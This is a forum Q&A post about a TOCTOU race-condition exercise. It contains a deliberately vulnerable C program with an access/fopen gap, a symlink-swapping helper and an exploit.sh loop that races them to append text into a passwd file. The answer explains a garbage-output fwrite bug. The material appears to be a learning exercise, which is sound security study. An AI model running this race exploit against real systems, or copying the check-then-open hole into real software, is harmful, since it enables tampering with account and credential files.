# Some dump comes out when giving inputs to program by using a pipe in Linux

Tags: linux, shell-script, pipe, echo

I'm now trying to do exploitation by using a race condition bug.
However, a problem occurs; Values that I have never given to the process come out.

Below is a description of the case.

Scenario:
An attacker finds out that some program is vulnerable to a race condition.
So she makes a program that creates a symbolic link from a file that the attacker can manage to the ./passwd file. After doing that, she makes a shell script that runs the vulnerable program and the program she made simultaneously till it detects modification of the ./passwd file.

The vulnerable code is here:

**vulnerable-program.c**

```
#include<stdio.h>
#include<unistd.h>
#include<string.h>

#define DELAY 50000


int main(int argc, char *argv[]){
    char *fileName = argv[1];
    char buffer[60];

    int i;

    FILE *fileHandler;

    scanf("%50s", buffer);

    if(!access(fileName, W_OK)){
        int a;
        for(i=0;i<DELAY;i++){
            a=i^2;
        }

        fileHandler = fopen(fileName, "a+");

        fwrite("\n", sizeof(char), strlen(buffer), fileHandler);
        fwrite(buffer, sizeof(char), strlen(buffer), fileHandler);
        fwrite("\n", sizeof(char), 1, fileHandler);
        fclose(fileHandler);
    }

    else{
     
    }
 
}
```

The program that uses a race condition for exploitation is here:

**symbolic-link.c**

```
#include<stdio.h>
#include<unistd.h>
#include<string.h>

int main(int argc, char *argv[]){
    unlink(argv[1]);
    symlink("./passwd", argv[1]);
    return 0;
}
```

and here is the shellscript:

**exploit.sh**

```
old=`ls -l passwd`; new=`ls -l passwd`

while [ "$old" = "$new" ]
do

    rm -rf temp
    echo "This is a file that the user can overwrite" > temp
    echo -e "TOCTOU-Attack-Success" | ./vulnerable-program temp & ./symbolic-link temp & new=`ls -l passwd`


done

rm -rf temp;

echo "STOP... The passwd file has been changed"
```

However, if I run the exploit.sh, the outcome becomes like this:

[image]

Plus, If I try to give a string which is very long like the user information written in the /etc/shadow file, it keeps appearing in the passwd file, truncated.

---

Actually, at the first, there was a `printf("No Permission \n");` code line in the else branch of the vulnerable-program.c. However, because of the same problem, the string "No Permission " keeps concatenated in front of the "TOCTOU-Attack-Success" string and is delivered to the passwd file continuously to make me remove that code line.

It would be a big pleasure if you guys could help me... Now I really don't know what to do to do troubleshooting.

Answer (score 1):

`fwrite("\n", sizeof(char), strlen(buffer), fileHandler);`

Sends a newline, plus some garbage from the read-only data area that happens to follow the constant string "\n", up to the length of your input string.